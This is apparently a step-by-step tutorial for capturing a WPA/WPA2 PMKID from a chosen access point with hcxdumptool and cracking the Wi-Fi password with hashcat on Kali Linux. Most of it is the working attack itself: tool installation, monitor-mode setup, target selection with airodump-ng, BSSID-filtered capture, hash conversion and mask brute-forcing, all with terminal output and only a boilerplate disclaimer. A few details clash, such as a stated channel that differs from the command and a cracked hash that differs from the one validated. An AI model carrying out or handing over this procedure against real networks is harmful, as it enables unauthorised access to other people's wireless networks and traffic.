How To Capture WPA/WPA2 PMKID Kali Linux 2018.4

In this guide i will use the new method to capture WPA2 handshake.

“This attack was discovered accidentally while looking for new ways to attack the new WPA3 security standard. WPA3 will be much harder to attack because of its modern key establishment protocol called “Simultaneous Authentication of Equals” (SAE).

The main difference from existing attacks is that in this attack, capture of a full EAPOL 4-way handshake is not required. The new attack is performed on the RSN IE (Robust Security Network Information Element) of a single EAPOL frame.”

DISCLAIMER: This software/tutorial is for educational purposes only. It should not be used for illegal activity. The author is not responsible for its use or the users action.

Step 1: Install Dependencies And Tools

1.1 Install dependence

sudo apt install libcurl4-openssl-dev libpcap0.8-dev zlib1g-dev libssl-dev

1.2 In order to use the new attack you need the following tools:

Download hcxdumptool, hcxtools and hashcat

sudo git clone https://github.com/ZerBea/hcxdumptool.git

sudo git clone https://github.com/ZerBea/hcxtools.git

sudo git clone https://github.com/hashcat/hashcat.git

1.3 Install hcxdumptool

cd hcxdumptool

1.3.a Create the installation

sudo make

1.3.b Start the installation

sudo make install

1.4.a Install hcxtools

cd ..
cd hcxtools/

1.4.b Create the installation 

sudo make

1.4.c Start the installation

sudo make install

1.5.a Install hashcat

cd ..
cd hashcat

1.5.b Create the installation

sudo make

1.5.c Start the installation

sudo make install

Step 2: Configure Network Card

2.1 Set network card in monitor mode

## Set interface down
sudo ip link set wlan0 down
 
## Set monitor mode
sudo iwconfig wlan0 mode monitor
 
## Set interface up
sudo ip link set wlan0 up

2.2 Confirm monitor mode (ALFA AWUS1900)

sudo iwconfig
root@GalaxyS9:~/hashcat# sudo iwconfig
wlan0     IEEE 802.11  Mode:Monitor  Frequency:2.442 GHz  Tx-Power=30 dBm   
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Power Management:off
          
lo        no wireless extensions.

eth0      no wireless extensions.

root@GalaxyS9:~/hashcat# 

2.3 Kill the wpa_supplicant for wlan0

sudo wpa_cli terminate wlan0
oot@GalaxyS9:~/hashcat# sudo wpa_cli terminate wlan0
Selected interface 'wlan0'
OK
root@GalaxyS9:~/hashcat# 

Step 3: Use Airodump-ng to sniff nearby networks

3.1 Open a new terminal and run airodump-ng to find your target BSSID

sudo airodump-ng --ivs wlan0

## Or dump the capture to a file
sudo airodump-ng wlan0 --ivs --wps -w /root/Desktop/Dump01 --output-format csv

BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID 
84:C9:B2:6A:9E:90  -38       21        3    0   1  130  WPA2 CCMP   PSK  HonnyP01

3.2 Open a new terminal and navigate to the hashcat directory and create a filtermode file with our Target BSSID

## Open hashcat directory
cd hashcat/

## Create the filtermode file and enter the targets BSSID 
## Target BSSID 84:C9:B2:6A:9E:90 ESSID HonnyP01 Chanel 1
## "echo "BSSID">filter.txt"

sudo echo "84C9B26A9E90">filter.txt

Step 4: Use Hcxdumptool To Catch PMKID From The Target

4.1 Lunch Hcxdumptool and write to cap01.pcapng and use the filermode file and only use chanel 5

sudo hcxdumptool -o cap01.pcapng -i wlan0 --filterlist=filter.txt --filtermode=2 --enable_status=1 -c 1
start capturing (stop with ctrl+c)
INTERFACE:...............: wlan0
ERRORMAX.................: 100 errors
FILTERLIST...............: 1 entries
MAC CLIENT...............: e804100a061d
MAC ACCESS POINT.........: 18421de033b8 (incremented on every new client)
EAPOL TIMEOUT............: 150000
REPLAYCOUNT..............: 64358
ANONCE...................: edcf48118ea4f0cfc15bf88ece2f38cad42b2e7b294f1db5d3288c7e477fb3b5

INFO: cha=3, rx=999, rx(dropped)=55, tx=32, powned=0, err=0

Let the tool run at least 10 minutes and If an AP receives the association request packet and supports sending PMKID you will see a message “FOUND PMKID”

[16:25:48 - 011] 12acf1e762A4 -> 84C9B26A9E90 <ESSID> [ASSOCIATIONREQUEST, SEQUENCE 4]
[16:25:48 - 011] 84C9B26A9E90-> 12acf1e762A4 [ASSOCIATIONRESPONSE, SEQUENCE 1416]
[16:25:48 - 011] 84C9B26A9E90-> 12acf1e762A4 [FOUND PMKID]

4.2 Run hcxpcaptool to convert the captured data from pcapng format to a hash format accepted by hashcat

sudo hcxpcaptool -E essidlist -I identitylist -U usernamelist -z cap01.16800 cap01.pcapng
root@GalaxyS9:~/hashcat# sudo hcxpcaptool -E essidlist -I identitylist -U usernamelist -z cap01.16800 cap01.pcapng

reading from cap01.pcapng
                                                
summary:                                        
--------
file name....................: cap01.pcapng
file type....................: pcapng 1.0
file hardware information....: armv7l
file os information..........: Linux 4.14.79-v7+
file application information.: hcxdumptool 5.1.0
network type.................: DLT_IEEE802_11_RADIO (127)
endianess....................: little endian
read errors..................: flawless
packets inside...............: 81
skipped packets..............: 0
packets with GPS data........: 0
packets with FCS.............: 0
WDS packets..................: 2
beacons (with ESSID inside)..: 22
probe requests...............: 22
probe responses..............: 14
association requests.........: 1
association responses........: 1
reassociation responses......: 2
authentications (OPEN SYSTEM): 8
authentications (BROADCOM)...: 8
EAPOL packets................: 8
EAPOL PMKIDs.................: 1
best handshakes..............: 1 (ap-less: 0)

1 PMKID(s) written to cap01.16800
root@GalaxyS9:~/hashcat#

4.3 Validate the hash

cat cap01.16800
root@GalaxyS9:~/hashcat# cat cap01.16800
4a12770f5a10315f7a8a6e9cd311c9ca*1cb72c843c70*b0ca68623d4f*506f6e747553
root@GalaxyS9:~/hashcat# 

4.4 Crack the formated pcapng with hashcat

./hashcat -m 16800 cap01.16800 -a 3 -w 3 '?l?l?l?l?l?lt!'
[s]tatus [p]ause [b]ypass heckpoint [q]uit =>

Session..........: hashcat
Status...........: Running
Hash.Type........: WPA-PMKID-PBKDF2
Hash.Target......: 9ba69e3487f514214f1e0fa61ab78fb1*08863bdd2c95*a46cf...323464
Time.Started.....: Sun Dec 23 22:02:53 2018 (3 mins, 2 secs)
Time.Estimated...: Sun Dec 23 22:20:42 2018 (14 mins, 47 secs)
Guess.Mask.......: '?l?l?l?l?l?lt!' [10]
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   289.5 kH/s (51.84ms) @ Accel:256 Loops:64 Thr:256 Vec:1
Recovered........: 0/1 (0.00%) Digests, 0/1 (0.00%) Salts
Progress.........: 52101120/308915776 (16.87%)
Rejected.........: 0/52101120 (0.00%)
Restore.Point....: 52101120/308915776 (16.87%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:3456-3520
Candidates.#1....: 'lwybcot!' -> 'yymytht!'
Hardware.Mon.#1..: Temp: 77c Fan: 55% Util: 99% Core:1822MHz Mem:4006MHz Bus:16

For a more detail guide on how to use hashcat please see the guide on how to use hashcat in windows.

DISCLAIMER: This software/tutorial is for educational purposes only. It should not be used for illegal activity. The author is not responsible for its use or the users action.

Donate